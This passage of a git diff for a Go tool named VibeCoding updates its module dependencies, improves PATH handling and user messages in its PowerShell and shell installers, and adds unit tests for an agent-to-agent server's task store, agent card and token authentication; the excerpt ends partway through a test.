 	github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f // indirect
+	github.com/gogo/protobuf v1.3.2 // indirect
 	github.com/gorilla/css v1.0.1 // indirect
+	github.com/gorilla/websocket v1.5.0 // indirect
 	github.com/inconshreveable/mousetrap v1.1.0 // indirect
 	github.com/lucasb-eyer/go-colorful v1.3.0 // indirect
 	github.com/mattn/go-isatty v0.0.20 // indirect
@@ -39,8 +44,6 @@ require (
 	github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e // indirect
 	github.com/yuin/goldmark v1.7.13 // indirect
 	github.com/yuin/goldmark-emoji v1.0.6 // indirect
-	golang.org/x/net v0.38.0 // indirect
 	golang.org/x/sync v0.17.0 // indirect
-	golang.org/x/sys v0.37.0 // indirect
 	golang.org/x/text v0.30.0 // indirect
 )
diff --git a/go.sum b/go.sum
index 174f8a1..1615bcb 100644
--- a/go.sum
+++ b/go.sum
@@ -37,12 +37,20 @@ github.com/dlclark/regexp2 v1.11.5 h1:Q/sSnsKerHeCkc/jSTNq1oCm7KiVgUMZRDUoRu0JQZ
 github.com/dlclark/regexp2 v1.11.5/go.mod h1:DHkYz0B9wPfa6wondMfaivmHpzrQ3v9q8cnmRbL6yW8=
 github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f h1:Y/CXytFA4m6baUTXGLOoWe4PQhGxaX0KpnayAqC48p4=
 github.com/erikgeiser/coninput v0.0.0-20211004153227-1c3628e74d0f/go.mod h1:vw97MGsxSvLiUE2X8qFplwetxpGLQrlU1Q9AUEIzCaM=
+github.com/gogo/protobuf v1.3.2 h1:Ov1cvc58UF3b5XjBnZv7+opcTcQFZebYjWzi34vdm4Q=
+github.com/gogo/protobuf v1.3.2/go.mod h1:P1XiOD3dCwIKUDQYPy72D8LYyHL2YPYrpS2s69NZV8Q=
 github.com/gorilla/css v1.0.1 h1:ntNaBIghp6JmvWnxbZKANoLyuXTPZ4cAMlo6RyhlbO8=
 github.com/gorilla/css v1.0.1/go.mod h1:BvnYkspnSzMmwRK+b8/xgNPLiIuNZr6vbZBTPQ2A3b0=
+github.com/gorilla/websocket v1.5.0 h1:PPwGk2jz7EePpoHN/+ClbZu8SPxiqlu12wZP/3sWmnc=
+github.com/gorilla/websocket v1.5.0/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
 github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM=
 github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg=
 github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
 github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
+github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8=
+github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck=
+github.com/larksuite/oapi-sdk-go/v3 v3.9.3 h1:iNFKhvOMthaHw5GVrbwdcGbzKkGpHR1ITWpp6fe3Rhk=
+github.com/larksuite/oapi-sdk-go/v3 v3.9.3/go.mod h1:ZEplY+kwuIrj/nqw5uSCINNATcH3KdxSN7y+UxYY5fI=
 github.com/lucasb-eyer/go-colorful v1.3.0 h1:2/yBRLdWBZKrf7gB40FoiKfAWYQ0lqNcbuQwVHXptag=
 github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0=
 github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
@@ -73,23 +81,50 @@ github.com/spf13/pflag v1.0.9 h1:9exaQaMOCwffKiiiYk6/BndUBv+iRViNW+4lEMi0PvY=
 github.com/spf13/pflag v1.0.9/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg=
 github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no=
 github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM=
+github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
+github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
 github.com/yuin/goldmark v1.7.13 h1:GPddIs617DnBLFFVJFgpo1aBfe/4xcvMc3SB5t/D0pA=
 github.com/yuin/goldmark v1.7.13/go.mod h1:ip/1k0VRfGynBgxOz0yCqHrbZXhcjxyuS66Brc7iBKg=
 github.com/yuin/goldmark-emoji v1.0.6 h1:QWfF2FYaXwL74tfGOW5izeiZepUDroDJfWubQI9HTHs=
 github.com/yuin/goldmark-emoji v1.0.6/go.mod h1:ukxJDKFpdFb5x0a5HqbdlcKtebh086iJpI31LTKmWuA=
 go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg=
+golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
+golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
+golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
 golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561 h1:MDc5xs78ZrZr3HMQugiXOAkSZtfTpbJLDr/lwfgO53E=
 golang.org/x/exp v0.0.0-20220909182711-5c715a9e8561/go.mod h1:cyybsKvd6eL0RnXn6p/Grxp8F5bW7iYuBgsNCOHpMYE=
+golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
+golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
+golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
+golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
+golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
 golang.org/x/net v0.38.0 h1:vRMAPTMaeGqVhG5QyLJHqNDwecKTomGeqbnfZyKlBI8=
 golang.org/x/net v0.38.0/go.mod h1:ivrbrMbzFq5J41QOQh0siUuly180yBYtLp+CKbEaFx8=
+golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
+golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
 golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug=
 golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI=
+golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
+golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
+golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210809222454-d867a43fc93e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ=
 golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
 golang.org/x/term v0.36.0 h1:zMPR+aF8gfksFprF/Nc/rd1wRS1EI6nDBGyWAvDzx2Q=
 golang.org/x/term v0.36.0/go.mod h1:Qu394IJq6V6dCBRgwqshf3mPF85AqzYEzofzRdZkWss=
+golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
+golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
 golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k=
 golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM=
+golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo=
+golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
+golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
+golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
+golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
 gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
diff --git a/install.ps1 b/install.ps1
index 16d1a38..6357d2f 100644
--- a/install.ps1
+++ b/install.ps1
@@ -100,11 +100,17 @@ try {
     # Add to PATH if not already present
     $currentPath = [Environment]::GetEnvironmentVariable("Path", "User")
 
-    if ($currentPath -notlike "*$installDir*") {
+    # Use exact matching by splitting PATH into entries
+    $pathEntries = if ($currentPath) { $currentPath -split ';' | Where-Object { $_ -ne '' } } else { @() }
+
+    if ($pathEntries -notcontains $installDir) {
         Write-Info "Adding $installDir to PATH..."
-        [Environment]::SetEnvironmentVariable("Path", "$currentPath;$installDir", "User")
-        $env:Path = "$env:Path;$installDir"
-        Write-Success "Added to PATH (restart terminal to take effect)"
+        # Safely join without leading/trailing semicolons
+        $newPath = if ($currentPath) { "$currentPath;$installDir" } else { $installDir }
+        [Environment]::SetEnvironmentVariable("Path", $newPath, "User")
+        # Update current session PATH so user can use it immediately
+        $env:Path = [Environment]::GetEnvironmentVariable("Path", "Machine") + ";" + [Environment]::GetEnvironmentVariable("Path", "User")
+        Write-Success "Added to PATH (restart other terminals to take effect)"
     } else {
         Write-Info "$installDir is already in PATH"
     }
@@ -116,17 +122,37 @@ try {
     Write-Host ""
     Write-Success "Installation complete!"
     Write-Host ""
-    Write-Host "  Version: $version" -ForegroundColor White
-    Write-Host ""
-    Write-Host "  Config directory: $configDir" -ForegroundColor White
-    Write-Host "    - Settings file : $settingsPath" -ForegroundColor Gray
-    Write-Host ""
-    Write-Host "  Get started:" -ForegroundColor White
-    Write-Host "    vibecoding --help" -ForegroundColor Gray
+    Write-Host "  Install directory: $destPath" -ForegroundColor White
+    Write-Host "  Config directory : $configDir" -ForegroundColor White
+    Write-Host "    - Settings file: $settingsPath" -ForegroundColor Gray
     Write-Host ""
-    Write-Host "  Note: Restart your terminal to use vibecoding" -ForegroundColor Yellow
+    Write-Host "  Version: $version" -ForegroundColor White
     Write-Host ""
 
+    # Check if vibecoding is available
+    $vibecodingPath = Get-Command vibecoding -ErrorAction SilentlyContinue
+    if ($vibecodingPath) {
+        Write-Host "  Get started:" -ForegroundColor White
+        Write-Host "    vibecoding --help" -ForegroundColor Gray
+        Write-Host ""
+    } else {
+        Write-Warn "'vibecoding' is not found in your current PATH."
+        Write-Host ""
+        Write-Host "  To add it to your PATH manually:" -ForegroundColor White
+        Write-Host ""
+        Write-Host "  # PowerShell (current session):" -ForegroundColor Cyan
+        Write-Host "    \$env:Path += \";$installDir\"" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # PowerShell (permanent, current user):" -ForegroundColor Cyan
+        Write-Host "    [Environment]::SetEnvironmentVariable('Path', \$env:Path + ';$installDir', 'User')" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # CMD (permanent, current user):" -ForegroundColor Cyan
+        Write-Host "    setx Path \"%Path%;$installDir\"" -ForegroundColor Cyan
+        Write-Host ""
+        Write-Host "  # Or add via System Settings > Environment Variables > User PATH" -ForegroundColor Cyan
+        Write-Host ""
+    }
+
 } catch {
     Write-Error "Installation failed: $_"
 } finally {
diff --git a/install.sh b/install.sh
index 134dab1..f0c7bd2 100755
--- a/install.sh
+++ b/install.sh
@@ -5,6 +5,11 @@ set -euo pipefail
 trap 'error "Installation failed at line $LINENO."' ERR
 
 # VibeCoding Installer
+# Progressive and agile vibe-coding tool. No need to re-deploy Claw/Hermes;
+# everything is packed into a single file.
+# 主打渐进式、敏捷开发体验的 VibeCoding 工具，整体打包为单个文件，开箱即用，
+# 无需重复搭建部署 Claude Code、codex、Claw、Hermes 环境。
+#
 # Downloads and installs the latest release from GitHub
 #
 # Supports non-root installation to ~/.vibecoding/bin
@@ -172,13 +177,19 @@ detect_shell_config() {
             fi
             ;;
         bash)
-            # .bashrc is most common; .bash_profile for login shells on macOS
-            if [ -f "${HOME}/.bashrc" ]; then
-                echo "${HOME}/.bashrc"
-            elif [ -f "${HOME}/.bash_profile" ]; then
-                echo "${HOME}/.bash_profile"
+            # macOS uses login shells by default, so .bash_profile takes precedence
+            if [ "$(uname -s)" = "Darwin" ]; then
+                if [ -f "${HOME}/.bash_profile" ]; then
+                    echo "${HOME}/.bash_profile"
+                elif [ -f "${HOME}/.bashrc" ]; then
+                    echo "${HOME}/.bashrc"
+                else
+                    echo "${HOME}/.bash_profile"
+                fi
             else
-                if [ "$(uname -s)" = "Darwin" ]; then
+                if [ -f "${HOME}/.bashrc" ]; then
+                    echo "${HOME}/.bashrc"
+                elif [ -f "${HOME}/.bash_profile" ]; then
                     echo "${HOME}/.bash_profile"
                 else
                     echo "${HOME}/.bashrc"
@@ -222,7 +233,8 @@ add_to_path() {
     local path_line
     case "$shell_name" in
         fish)
-            path_line="set -gx PATH ${INSTALL_DIR} \$PATH"
+            # Single-quote $PATH to prevent bash from expanding it
+            path_line="set -gx PATH ${INSTALL_DIR} "'$PATH'
             ;;
         *)
             path_line="export PATH=\"${INSTALL_DIR}:\$PATH\""
@@ -238,16 +250,27 @@ add_to_path() {
 
 # Check if installed directory is in PATH
 check_path() {
-    # If already in PATH, nothing to do
+    local config_file
+    config_file=$(detect_shell_config)
+
+    # First check if already configured in shell config file
+    if [ -f "$config_file" ] && grep -q "\.vibecoding/bin" "$config_file" 2>/dev/null; then
+        # Already in config, but check if it's in current session too
+        if echo "$PATH" | tr ':' '\n' | grep -qx "$INSTALL_DIR"; then
+            return 0
+        fi
+        info "PATH already configured in ${config_file} but not active in current session"
+        warn "Run: source ${config_file}"
+        return 0
+    fi
+
+    # If already in current PATH, nothing to do
     if echo "$PATH" | tr ':' '\n' | grep -qx "$INSTALL_DIR"; then
         return 0
     fi
     
     # For user-level install, auto-add to shell config
     if [ "$INSTALL_DIR" = "$USER_INSTALL_DIR" ]; then
-        local config_file
-        config_file=$(detect_shell_config)
-        
         echo ""
         info "Detected shell: $(basename "${SHELL:-bash}")"
         info "Shell config: ${config_file}"
@@ -396,31 +419,57 @@ main() {
 
     # Verify installation
     echo ""
+    success "Installation complete!"
+    echo ""
+    echo "  Install directory: ${INSTALL_DIR}/${BINARY_NAME}"
+    echo "  Config directory : ${config_dir}"
+    echo "    - Settings file: ${config_dir}/settings.json"
+    echo ""
+
     if command -v "$BINARY_NAME" &> /dev/null; then
         local installed_version
         installed_version=$("$BINARY_NAME" --version 2>/dev/null || echo "unknown")
-        success "Installation complete!"
-        echo ""
         echo "  Version: ${installed_version}"
         echo ""
-        echo "  Config directory: ${config_dir}"
-        echo "    - Settings file : ${config_dir}/settings.json"
-        echo ""
         echo "  Get started:"
         echo "    ${BINARY_NAME} --help"
         echo ""
     else
-        success "Installation complete!"
+        warn "'${BINARY_NAME}' is not found in your current PATH."
         echo ""
-        echo "  Binary installed to:"
-        echo "    ${INSTALL_DIR}/${BINARY_NAME}"
+        echo "  Add it to your PATH manually:"
         echo ""
-        echo "  Config directory: ${config_dir}"
-        echo "    - Settings file : ${config_dir}/settings.json"
-        echo ""
-        echo "  To use right now:"
-        echo "    export PATH=\"${INSTALL_DIR}:\$PATH\""
-        echo "    ${BINARY_NAME} --help"
+        local shell_name
+        shell_name="$(basename "${SHELL:-bash}")"
+        case "$shell_name" in
+            fish)
+                echo -e "  ${CYAN}# Fish${NC}"
+                echo -e "  ${CYAN}set -gx PATH ${INSTALL_DIR} \$PATH${NC}"
+                echo -e "  ${CYAN}# Or add to ~/.config/fish/config.fish:${NC}"
+                echo -e "  ${CYAN}set -gx PATH ${INSTALL_DIR} \$PATH${NC}"
+                ;;
+            zsh)
+                echo -e "  ${CYAN}# Zsh${NC}"
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                echo -e "  ${CYAN}# Or add to ~/.zshenv:${NC}"
+                echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.zshenv${NC}"
+                ;;
+            bash)
+                echo -e "  ${CYAN}# Bash${NC}"
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                if [ "$(uname -s)" = "Darwin" ]; then
+                    echo -e "  ${CYAN}# Or add to ~/.bash_profile:${NC}"
+                    echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.bash_profile${NC}"
+                else
+                    echo -e "  ${CYAN}# Or add to ~/.bashrc:${NC}"
+                    echo -e "  ${CYAN}echo 'export PATH=\"${INSTALL_DIR}:\$PATH\"' >> ~/.bashrc${NC}"
+                fi
+                ;;
+            *)
+                echo -e "  ${CYAN}export PATH=\"${INSTALL_DIR}:\$PATH\"${NC}"
+                echo -e "  ${CYAN}# Add the above line to your shell config file${NC}"
+                ;;
+        esac
         echo ""
     fi
 }
diff --git a/internal/a2a/a2a_test.go b/internal/a2a/a2a_test.go
new file mode 100644
index 0000000..277aa3b
--- /dev/null
+++ b/internal/a2a/a2a_test.go
@@ -0,0 +1,712 @@
+package a2a
+
+import (
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"sync"
+	"testing"
+	"time"
+)
+
+func TestDefaultConfig(t *testing.T) {
+	cfg := DefaultConfig()
+	if cfg.Port != 8093 {
+		t.Errorf("expected port 8093, got %d", cfg.Port)
+	}
+	if cfg.Host != "127.0.0.1" {
+		t.Errorf("expected host 127.0.0.1, got %s", cfg.Host)
+	}
+	if cfg.Enabled {
+		t.Error("expected disabled by default")
+	}
+}
+
+func TestGetListenAddr(t *testing.T) {
+	cfg := &Config{Host: "127.0.0.1", Port: 9090}
+	if addr := cfg.GetListenAddr(); addr != "127.0.0.1:9090" {
+		t.Errorf("expected 127.0.0.1:9090, got %s", addr)
+	}
+}
+
+func TestGetWorkDir(t *testing.T) {
+	cfg := &Config{WorkDir: "/tmp/test"}
+	if wd := cfg.GetWorkDir(); wd != "/tmp/test" {
+		t.Errorf("expected /tmp/test, got %s", wd)
+	}
+
+	cfg2 := &Config{WorkDir: ""}
+	wd := cfg2.GetWorkDir()
+	if wd == "" {
+		t.Error("expected non-empty work dir")
+	}
+}
+
+func TestTaskStore(t *testing.T) {
+	store := NewTaskStore()
+
+	// Create
+	task := store.Create("task_1")
+	if task.ID != "task_1" {
+		t.Errorf("expected task_1, got %s", task.ID)
+	}
+	if task.State != TaskStateSubmitted {
+		t.Errorf("expected submitted, got %s", task.State)
+	}
+
+	// Get
+	got := store.Get("task_1")
+	if got == nil {
+		t.Fatal("expected task, got nil")
+	}
+	if got.ID != "task_1" {
+		t.Errorf("expected task_1, got %s", got.ID)
+	}
+
+	// Get non-existent
+	if store.Get("nonexistent") != nil {
+		t.Error("expected nil for non-existent task")
+	}
+
+	// Update state
+	store.SetState("task_1", TaskStateWorking)
+	task = store.Get("task_1")
+	if task.State != TaskStateWorking {
+		t.Errorf("expected working, got %s", task.State)
+	}
+
+	// Update
+	task.State = TaskStateCompleted
+	store.Update(task)
+	task = store.Get("task_1")
+	if task.State != TaskStateCompleted {
+		t.Errorf("expected completed, got %s", task.State)
+	}
+}
+
+func TestTaskStoreGetReturnsCopy(t *testing.T) {
+	store := NewTaskStore()
+	task := store.Create("task_1")
+	task.State = TaskStateCompleted
+	task.Message = &Message{Role: "user", Parts: []MessagePart{{Type: "text", Text: "original"}}}
+	task.Metadata = map[string]any{"k": "v"}
+	store.Update(task)
+
+	got := store.Get("task_1")
+	got.State = TaskStateFailed
+	got.Message.Parts[0].Text = "mutated"
+	got.Metadata["k"] = "mutated"
+
+	again := store.Get("task_1")
+	if again.State != TaskStateCompleted {
+		t.Fatalf("state = %s, want completed", again.State)
+	}
+	if again.Message.Parts[0].Text != "original" {
+		t.Fatalf("message text = %q, want original", again.Message.Parts[0].Text)
+	}
+	if again.Metadata["k"] != "v" {
+		t.Fatalf("metadata k = %v, want v", again.Metadata["k"])
+	}
+}
+
+func TestNewTaskIDConcurrentUnique(t *testing.T) {
+	const count = 500
+	var wg sync.WaitGroup
+	ids := make(chan string, count)
+
+	for i := 0; i < count; i++ {
+		wg.Add(1)
+		go func() {
+			defer wg.Done()
+			ids <- newTaskID()
+		}()
+	}
+	wg.Wait()
+	close(ids)
+
+	seen := make(map[string]bool, count)
+	for id := range ids {
+		if seen[id] {
+			t.Fatalf("duplicate id: %s", id)
+		}
+		seen[id] = true
+	}
+}
+
+func TestTaskStateTransitions(t *testing.T) {
+	states := []TaskState{
+		TaskStateSubmitted,
+		TaskStateWorking,
+		TaskStateCompleted,
+		TaskStateFailed,
+		TaskStateCanceled,
+	}
+
+	for _, state := range states {
+		if string(state) == "" {
+			t.Errorf("empty state in list")
+		}
+	}
+}
+
+func TestDefaultAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+
+	if card.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", card.Name)
+	}
+	if card.Version != "0.1.27" {
+		t.Errorf("expected 0.1.27, got %s", card.Version)
+	}
+	if card.URL != "http://localhost:8093/a2a" {
+		t.Errorf("expected http://localhost:8093/a2a, got %s", card.URL)
+	}
+	if !card.Capabilities.Streaming {
+		t.Error("expected streaming=true")
+	}
+	if len(card.Skills) != 3 {
+		t.Errorf("expected 3 skills, got %d", len(card.Skills))
+	}
+}
+
+func TestHandleAgentCard(t *testing.T) {
+	card := DefaultAgentCard("0.1.27", "http://localhost:8093")
+	handler := HandleAgentCard(card)
+
+	// GET request
+	req := httptest.NewRequest("GET", "/.well-known/agent.json", nil)
+	w := httptest.NewRecorder()
+	handler(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var got AgentCard
+	if err := json.NewDecoder(w.Body).Decode(&got); err != nil {
+		t.Fatalf("decode error: %v", err)
+	}
+	if got.Name != "VibeCoding" {
+		t.Errorf("expected VibeCoding, got %s", got.Name)
+	}
+
+	// POST should be rejected
+	req2 := httptest.NewRequest("POST", "/.well-known/agent.json", nil)
+	w2 := httptest.NewRecorder()
+	handler(w2, req2)
+	if w2.Code != http.StatusMethodNotAllowed {
+		t.Errorf("expected 405, got %d", w2.Code)
+	}
+}
+
+func TestServerAuthProtectsA2AEndpoints(t *testing.T) {
+	srv := NewServer(&Config{Host: "127.0.0.1", Port: 8093, AuthToken: "secret"}, "0.1.27", &mockExecutor{response: "ok"})
+
+	params := SendMessageParams{
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+	reqBody := JSONRPCRequest{JSONRPC: "2.0", Method: "message/send", Params: paramsJSON, ID: 1}
+	body, _ := json.Marshal(reqBody)
+
+	for _, tc := range []struct {
+		name   string
+		auth   string
+		status int
+	}{
+		{name: "missing", status: http.StatusUnauthorized},
+		{name: "invalid", auth: "Bearer wrong", status: http.StatusUnauthorized},
+		{name: "valid", auth: "Bearer secret", status: http.StatusOK},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+			req.Header.Set("Content-Type", "application/json")
+			if tc.auth != "" {
+				req.Header.Set("Authorization", tc.auth)
+			}
+			w := httptest.NewRecorder()
+
+			srv.mux.ServeHTTP(w, req)
+
+			if w.Code != tc.status {
+				t.Fatalf("status = %d, want %d; body=%s", w.Code, tc.status, w.Body.String())
+			}
+		})
+	}
+}
+
+func TestServerAuthLeavesAgentCardPublic(t *testing.T) {
+	srv := NewServer(&Config{Host: "127.0.0.1", Port: 8093, AuthToken: "secret"}, "0.1.27", &mockExecutor{})
+
+	req := httptest.NewRequest("GET", "/.well-known/agent.json", nil)
+	w := httptest.NewRecorder()
+	srv.mux.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Fatalf("status = %d, want %d", w.Code, http.StatusOK)
+	}
+}
+
+func TestHandlerMessageSend(t *testing.T) {
+	executor := &mockExecutor{
+		response: "Hello from agent",
+	}
+	handler := NewHandler(executor)
+
+	// Create a message/send request
+	params := SendMessageParams{
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params:  paramsJSON,
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+
+	handler.ServeHTTP(w, req)
+
+	if w.Code != http.StatusOK {
+		t.Errorf("expected 200, got %d", w.Code)
+	}
+
+	var resp JSONRPCResponse
+	if err := json.NewDecoder(w.Body).Decode(&resp); err != nil {
+		t.Fatalf("decode error: %v", err)
+	}
+	if resp.Error != nil {
+		t.Errorf("unexpected error: %s", resp.Error.Message)
+	}
+	if resp.JSONRPC != "2.0" {
+		t.Errorf("expected jsonrpc 2.0, got %s", resp.JSONRPC)
+	}
+}
+
+func TestHandlerMessageSendPersistsWorkingMessage(t *testing.T) {
+	executor := &blockingExecutor{
+		started: make(chan struct{}),
+		release: make(chan struct{}),
+	}
+	handler := NewHandler(executor)
+	handler.GetTaskStore().Create("persist_task")
+
+	params := SendMessageParams{
+		TaskID: "persist_task",
+		Message: &Message{
+			Role:  "user",
+			Parts: []MessagePart{{Type: "text", Text: "hello"}},
+		},
+	}
+	paramsJSON, _ := json.Marshal(params)
+	reqBody := JSONRPCRequest{
+		JSONRPC: "2.0",
+		Method:  "message/send",
+		Params:  paramsJSON,
+		ID:      1,
+	}
+	body, _ := json.Marshal(reqBody)
+
+	req := httptest.NewRequest("POST", "/a2a", strings.NewReader(string(body)))
+	req.Header.Set("Content-Type", "application/json")
+	w := httptest.NewRecorder()
+	done := make(chan struct{})
+	go func() {
+		defer close(done)
+		handler.ServeHTTP(w, req)
+	}()
+
+	select {
+	case <-executor.started:
+	case <-time.After(time.Second):
+		t.Fatal("timeout waiting for executor")
+	}
+
+	task := handler.GetTaskStore().Get("persist_task")
+	if task.State != TaskStateWorking {
+		t.Fatalf("state = %s, want working", task.State)
+	}
+	if task.Message == nil || task.Message.Parts[0].Text != "hello" {
+		t.Fatalf("message = %#v, want hello text", task.Message)
+	}
+
+	close(executor.release)
+	select {
+	case <-done:
